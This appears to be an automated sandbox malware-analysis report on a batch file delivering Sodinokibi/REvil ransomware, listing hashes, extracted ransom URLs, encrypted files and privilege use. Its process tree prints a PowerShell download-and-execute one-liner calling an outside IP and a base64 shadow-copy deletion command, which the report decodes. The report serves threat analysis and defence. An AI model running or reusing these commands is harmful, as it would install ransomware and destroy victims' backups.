Analysis

Max time kernel:  42s
Max time network: 57s
Platform:         windows7_x64
Resource:         win7v200430
Submitted:        16-06-2020 23:10

Tasks
  Static task:     static1
  Behavioral task: behavioral1  (Sample: c1babe66cde4ba7ca2635d448438e6a1.bat, Resource: win7v200430)
  Behavioral task: behavioral2  (Sample: c1babe66cde4ba7ca2635d448438e6a1.bat, Resource: win10)
General

Target: c1babe66cde4ba7ca2635d448438e6a1.bat
Size:   222B
MD5:    5d6a86f5f4937b08aee25aaa8d3a2055
SHA1:   14594baf678ec43b8a8b8b28a0712cfd6a1b1c49
SHA256: d12d6a19975f4a2ae445413df349de5478f7b5195a6da4dd6e2c4e05e2630e34
SHA512: f8d8fe726aeb722acc6c2aa83b191843b20f413da938723e00e6f780c32502f0faf001375a03787877d9464cf093774bcfaffd99d4fbf5574d87b6bd1292cc0f
Malware Config

Extracted
  http://185.103.242.78/pastes/c1babe66cde4ba7ca2635d448438e6a1

Extracted
  Path:   C:\424vc-readme.txt
  Family: sodinokibi
  URLs:   http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/56052A2C9F03212B
          http://decryptor.cc/56052A2C9F03212B
Signatures

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes:
    pid   process
    1496  powershell.exe
    1496  powershell.exe
    1496  powershell.exe
    1032  powershell.exe
    1032  powershell.exe
Blacklisted process makes network request (1 IoCs)
  Processes:
    flow  pid   process
    3     1496  powershell.exe
Modifies service (2 TTPs, 4 IoCs)
  Processes:
    description  ioc                                                                              process
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                vssvc.exe
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                       vssvc.exe
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer  vssvc.exe
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                  vssvc.exe
Drops file in Program Files directory (35 IoCs)
  Processes:
    description                   ioc                                                                                    process
    File opened for modification  \??\c:\program files\FindUnlock.midi                                                   powershell.exe
    File opened for modification  \??\c:\program files\PushRepair.clr                                                    powershell.exe
    File opened for modification  \??\c:\program files\SplitConfirm.snd                                                  powershell.exe
    File opened for modification  \??\c:\program files\AddComplete.WTV                                                   powershell.exe
    File opened for modification  \??\c:\program files\EditResume.DVR                                                    powershell.exe
    File opened for modification  \??\c:\program files\FindSelect.wmf                                                    powershell.exe
    File opened for modification  \??\c:\program files\RenameDebug.css                                                   powershell.exe
    File created                  \??\c:\program files\424vc-readme.txt                                                  powershell.exe
    File created                  \??\c:\program files (x86)\424vc-readme.txt                                            powershell.exe
    File opened for modification  \??\c:\program files\ConvertToProtect.i64                                              powershell.exe
    File opened for modification  \??\c:\program files\OptimizeRemove.xltx                                               powershell.exe
    File opened for modification  \??\c:\program files\PublishStop.pdf                                                   powershell.exe
    File opened for modification  \??\c:\program files\WriteShow.DVR-MS                                                  powershell.exe
    File opened for modification  \??\c:\program files\BackupTrace.emz                                                   powershell.exe
    File opened for modification  \??\c:\program files\CompressSend.asx                                                  powershell.exe
    File opened for modification  \??\c:\program files\MergeInitialize.svg                                               powershell.exe
    File opened for modification  \??\c:\program files\OpenGet.mp3                                                       powershell.exe
    File opened for modification  \??\c:\program files\PingHide.ppt                                                      powershell.exe
    File opened for modification  \??\c:\program files\RevokeInvoke.AAC                                                  powershell.exe
    File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\424vc-readme.txt  powershell.exe
    File opened for modification  \??\c:\program files\DismountRestart.vbe                                               powershell.exe
    File created                  \??\c:\program files\microsoft sql server compact edition\424vc-readme.txt               powershell.exe
    File opened for modification  \??\c:\program files\SaveClose.crw                                                     powershell.exe
    File opened for modification  \??\c:\program files\ClearEnable.vb                                                    powershell.exe
    File opened for modification  \??\c:\program files\CompressRepair.js                                                 powershell.exe
    File opened for modification  \??\c:\program files\RenameExit.jpg                                                    powershell.exe
    File opened for modification  \??\c:\program files\SendEdit.7z                                                       powershell.exe
    File opened for modification  \??\c:\program files\SetRestore.xml                                                    powershell.exe
    File opened for modification  \??\c:\program files\ResolveSearch.vdw                                                 powershell.exe
    File opened for modification  \??\c:\program files\EnableWrite.kix                                                   powershell.exe
    File opened for modification  \??\c:\program files\HideSwitch.3gp2                                                   powershell.exe
    File opened for modification  \??\c:\program files\MoveCompress.pptm                                                 powershell.exe
    File opened for modification  \??\c:\program files\ResizeUnlock.m4a                                                  powershell.exe
    File opened for modification  \??\c:\program files\SubmitReceive.vdw                                                 powershell.exe
    File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\424vc-readme.txt          powershell.exe
Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Enumerates connected drives (3 TTPs)
Suspicious use of WriteProcessMemory (5 IoCs)
  Processes:
    description                       pid   process         target process
    PID 1412 wrote to memory of 1496  1412  cmd.exe         powershell.exe
    PID 1496 wrote to memory of 1032  1496  powershell.exe  powershell.exe
    PID 1496 wrote to memory of 1032  1496  powershell.exe  powershell.exe
    PID 1496 wrote to memory of 1032  1496  powershell.exe  powershell.exe
    PID 1496 wrote to memory of 1032  1496  powershell.exe  powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes:
    description                      pid   process
    Token: SeDebugPrivilege          1496  powershell.exe
    Token: SeDebugPrivilege          1496  powershell.exe
    Token: SeDebugPrivilege          1032  powershell.exe
    Token: SeBackupPrivilege         1760  vssvc.exe
    Token: SeRestorePrivilege        1760  vssvc.exe
    Token: SeAuditPrivilege          1760  vssvc.exe
    Token: SeTakeOwnershipPrivilege  1496  powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes:
    description      ioc                                                                                                                                                         process
    Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\0l0985f1wk3.bmp"  powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes:
    pid   process
    1496  powershell.exe
Processes

C:\Windows\system32\cmd.exe (PID 1412)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\c1babe66cde4ba7ca2635d448438e6a1.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1496)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c1babe66cde4ba7ca2635d448438e6a1');Invoke-BZLEXSHRVANSJKV;Start-Sleep -s 10000"
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1032)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64 of a UTF-16LE string; decoded: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}  -- this is the shadow-copy deletion that triggers the vssvc.exe activity below)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID 1760)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken